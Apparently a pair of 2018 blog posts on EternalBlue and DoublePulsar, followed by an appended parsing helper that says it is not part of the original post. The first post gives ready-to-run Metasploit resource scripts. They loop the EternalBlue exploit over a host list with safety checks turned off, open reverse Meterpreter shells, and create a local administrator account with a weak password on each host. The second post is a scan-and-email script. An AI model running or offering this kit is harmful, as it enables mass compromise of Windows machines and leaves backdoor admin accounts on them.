Thursday, August 16, 2018

remotely exploit a number of hosts with metasploit via eternalblue

in a previous post i mentioned how to scan for doublepulsar-infected hosts and how to feed those hosts to msf. that's fine, but i guess mass-exploiting those hosts is of some utility, too.

## msfconsole

```
msf > vulns -R
... a lot of text ... look at the end of the output for a file dropped in /tmp, e.g.
RHOSTS => file:/tmp/msf-db-rhosts-20180816-27096-ncow7k

msf > exit

# cd ~/.msf4/
# cp /tmp/msf-db-rhosts-20180816-27096-ncow7k thewicked
# msfconsole -r doublepulsar-loop.rc
```

Once all has completed, look through ~/.msf4/logs/doublepulsar.log for adminuser, as those hosts have had the local admin user for your evil created.
## files

[doublepulsar-loop.rc]

```
<ruby>

# the rhosts from vuln_db
hostsfile = "/root/.msf4/thewicked"
hosts = []
File.open(hostsfile, "r") do |f|
  f.each_line do |line|
    hosts.push line.strip
  end
end

# msfconsole commands with chained post exploit
self.run_single("resource /root/.msf4/doublepulsar.rc")

# the rhosts loop
hosts.each do |rhost|
  self.run_single("set rhost #{rhost}")
  self.run_single("exploit")
  self.run_single("sleep 2s")
end

</ruby>
```

[doublepulsar.rc]

```
spool /root/.msf4/logs/doublepulsar.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true

use exploit/windows/smb/ms17_010_eternalblue
set VerifyArch False
set VerifyTarget False
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 
set AUTORUNSCRIPT multiscript -rc /root/.msf4/doublepulsar-lsadmin
```

[doublepulsar-lsadmin]

```
execute -H -f cmd.exe -a "/c net user adminuser badpassword /add"
execute -H -f cmd.exe -a "/c net localgroup administrators /add adminuser"
execute -H -f cmd.exe -a "/c bitsadmin task to download a scheduled task to patch and reboot"
exit
```


Monday, August 13, 2018

one-off doublepulsar scan script because sometimes people need to do one thing and one thing only

so yeah.

```bash
#!/bin/bash
EXECUTE=$(date "+%Y%m%d")

read -p "Enter IP to evaluate: " IP
if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
    read -p "Enter email address (or not): " EMAIL
else echo "Not a valid IP" && exit 1
fi

rm -rf /tmp/$IP
mkdir /tmp/$IP
cd /tmp/$IP

#msfconsole
sudo msfconsole -x "color false ; banner false ; spool /tmp/$IP/output.msf ; use auxiliary/scanner/smb/smb_ms17_010; set RHOSTS $IP ; run; exit"
# split the spool on "] ", drop noise lines, strip the port and keep only host lines
sed 's/]\ /\\\n/g' /tmp/$IP/output.msf | sed -r '/Error|NOT|properly|Script|\[|\]/d' | sed 's/:445//g' | sed '/-/!d' | sort -u > /tmp/$IP/output.msf.1
sed '/VULNERABLE/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.VULN
sed '/INFECTED/!d' /tmp/$IP/output.msf.1 > /tmp/$IP/output.msf.INFECTED
clear

if [ -s /tmp/$IP/output.msf.INFECTED ]
then
    echo " Uh oh $IP DoublePulsar infected"
    mail -s " $IP DoublePulsar infected " $EMAIL < /tmp/$IP/output.msf.INFECTED
    mail -s " $IP DoublePulsar infected $EXECUTE " youreffingsysadmin@hell.com < /tmp/$IP/output.msf.1
else
    echo " Phew $IP not infected "
fi

if [ -s /tmp/$IP/output.msf.VULN ]
then
    echo " Sigh $IP DoublePulsar vulnerable "
    mail -s " $IP DoublePulsar vulnerable " $EMAIL < /tmp/$IP/output.msf.1
else
    echo " Double Phew $IP not DoublePulsar vulnerable"
fi

cd /tmp
rm -rf /tmp/$IP

exit 0
```
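The sed chain in the script above is fragile: it keys on the `] ` separator and on a `-` appearing somewhere in the line, so a change in the scanner's wording or a timestamp prefix silently empties the VULN and INFECTED files. As an added example (not part of the original post), here is a small shell helper that classifies hosts from the same kind of spool file by matching the scanner's status messages directly. The sample spool lines are constructed, and the exact wording they imitate ("VULNERABLE to MS17-010", "INFECTED with DoublePulsar", "does NOT appear vulnerable") is an assumption about the output of auxiliary/scanner/smb/smb_ms17_010; check it against a real spool before relying on it.

```shell
#!/bin/bash
# Added example (not from the original post): classify hosts from an msfconsole
# spool file written by auxiliary/scanner/smb/smb_ms17_010.
# The message wording matched below is an assumption about the scanner's output
# format; verify it against a real spool before relying on it.

# Write a constructed sample spool file to $1 (three hosts: one infected and
# vulnerable, one only vulnerable, one clean).
make_sample_spool() {
    cat > "$1" <<'EOF'
[+] 10.0.0.5:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[+] 10.0.0.5:445       - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), Language: English
[+] 10.0.0.7:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[-] 10.0.0.9:445       - Host does NOT appear vulnerable.
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
EOF
}

# classify_ms17_010 <spool> <INFECTED|VULNERABLE|CLEAN>
# Prints the deduplicated IPs (port suffix stripped) whose lines match the class.
classify_ms17_010() {
    local spool="$1" class="$2" pattern
    case "$class" in
        INFECTED)   pattern='INFECTED with DoublePulsar' ;;
        VULNERABLE) pattern='VULNERABLE to MS17-010' ;;
        CLEAN)      pattern='does NOT appear vulnerable' ;;
        *) echo "unknown class: $class" >&2; return 2 ;;
    esac
    # Field 1 is the [+]/[-]/[*] marker, field 2 is ip:port.
    grep -F -- "$pattern" "$spool" | awk '{ sub(/:[0-9]+$/, "", $2); print $2 }' | sort -u
}

# host_status <spool> <ip>: prints the most severe class for one host
# (INFECTED beats VULNERABLE beats CLEAN), or UNKNOWN if the host was not scanned.
# Exit status is 0 when the host was found in the spool, 1 otherwise.
host_status() {
    local spool="$1" ip="$2" class
    for class in INFECTED VULNERABLE CLEAN; do
        if classify_ms17_010 "$spool" "$class" | grep -qxF -- "$ip"; then
            echo "$class"
            return 0
        fi
    done
    echo UNKNOWN
    return 1
}

# Stand-alone demo: build the sample spool and report each host.
demo_spool=$(mktemp)
make_sample_spool "$demo_spool"
for demo_ip in 10.0.0.5 10.0.0.7 10.0.0.9 10.0.0.11; do
    printf '%-12s %s\n' "$demo_ip" "$(host_status "$demo_spool" "$demo_ip")"
done
rm -f "$demo_spool"
```

In the one-off script this replaces the three sed lines and the two `-s` file tests: `host_status /tmp/$IP/output.msf $IP` yields a single word to branch on, and a host that the scanner never reported on comes back as UNKNOWN instead of being silently treated as "not vulnerable".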